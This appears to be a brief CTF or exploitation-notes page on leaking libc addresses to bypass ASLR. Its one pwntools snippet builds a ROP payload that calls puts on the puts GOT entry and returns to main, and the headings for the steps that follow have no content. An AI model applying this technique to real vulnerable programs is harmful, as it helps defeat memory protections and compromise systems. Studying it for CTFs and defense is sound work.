Leaking LibC
ASLR bypass
Leaking Libc function address
from pwn import *
elf = ELF('./chall')
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)Finding LIBC library
Getting libc base address
Resources
Last updated